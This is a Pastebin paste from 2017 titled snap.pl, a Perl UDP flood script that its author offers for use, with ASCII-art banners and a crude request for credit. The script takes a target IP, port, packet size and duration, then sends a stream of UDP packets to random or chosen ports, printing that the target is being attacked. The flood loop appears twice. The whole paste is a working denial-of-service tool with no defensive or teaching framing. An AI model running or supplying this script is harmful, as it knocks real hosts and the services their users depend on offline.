Advertisement
sNaP1194

snap.pl

Nov 22nd, 2017
170
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.64 KB | None | 0 0
  1. ▄████████ ███▄▄▄▄ ▄████████ ▄███████▄
  2. ███ ███ ███▀▀▀██▄ ███ ███ ███ ███
  3. ███ █▀ ███ ███ ███ ███ ███ ███
  4. ███ ███ ███ ███ ███ ███ ███
  5. ▀███████████ ███ ███ ▀███████████ ▀█████████▀
  6. ███ ███ ███ ███ ███ ███
  7. ▄█ ███ ███ ███ ███ ███ ███
  8. ▄████████▀ ▀█ █▀ ███ █▀ ▄████▀
  9.  
  10. THIS IS SNAP TCP'S PERL SCRIPT :)
  11. IF YOUR GOING TO EDIT PLEASE GIVE CREDIT
  12. DONT BE A FUCKING SKID AND DONT GIVE CREDIT MOTHER FUCKERS
  13. LOL MORE TO COME PEOPLE STAY TUNED BITCHES!!!!!
  14.  
  15.  
  16. #!/usr/bin/perl
  17.  
  18. ##
  19. #!/usr/bin/perl
  20.  
  21. use Socket;
  22. use strict;
  23.  
  24. my ($ip,$port,$size,$time) = @ARGV;
  25.  
  26. my ($iaddr,$endtime,$psize,$pport);
  27.  
  28. $iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
  29. $endtime = time() + ($time ? $time : 100);
  30. socket(flood, PF_INET, SOCK_DGRAM, 17);
  31.  
  32.  
  33. print <<EOTEXT;
  34.  
  35. ____ ___ ___ _ ________
  36. 6MMMMb\`MM\ `M' dM. `MMMMMMMb.
  37. 6M' ` MMM\ M ,MMb MM `Mb
  38. MM M\MM\ M d'YM. MM MM
  39. YM. M \MM\ M ,P `Mb MM MM
  40. YMMMMb M \MM\ M d' YM. MM .M9
  41. `Mb M \MM\ M ,P `Mb MMMMMMM9'
  42. MM M \MM\M d' YM. MM
  43. MM M \MMM ,MMMMMMMMb MM
  44. L ,M9 M \MM d' YM. MM
  45. MYMMMM9 _M_ \M _dM_ _dMM_MM_
  46.  
  47.  
  48.  
  49. EOTEXT
  50.  
  51. print "~You are attacking the ip: $ip " . ($port ? $port : "random") . " With " .
  52. ($size ? "$size-byte" : "Smacked With A Large Packets?") . " " .
  53. ($time ? "for $time seconds" : "") . "\n";
  54.  
  55. for (;time() <= $endtime;) {
  56. $psize = $size ? $size : int(rand(1024-64)+64) ;
  57. $pport = $port ? $port : int(rand(65500))+1;
  58.  
  59. send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport,
  60. $iaddr));}for (;time() <= $endtime;) {
  61. $psize = $size ? $size : int(rand(1024-64)+64) ;
  62. $pport = $port ? $port : int(rand(65500))+1;
  63.  
  64. send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport,
  65. $iaddr));}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement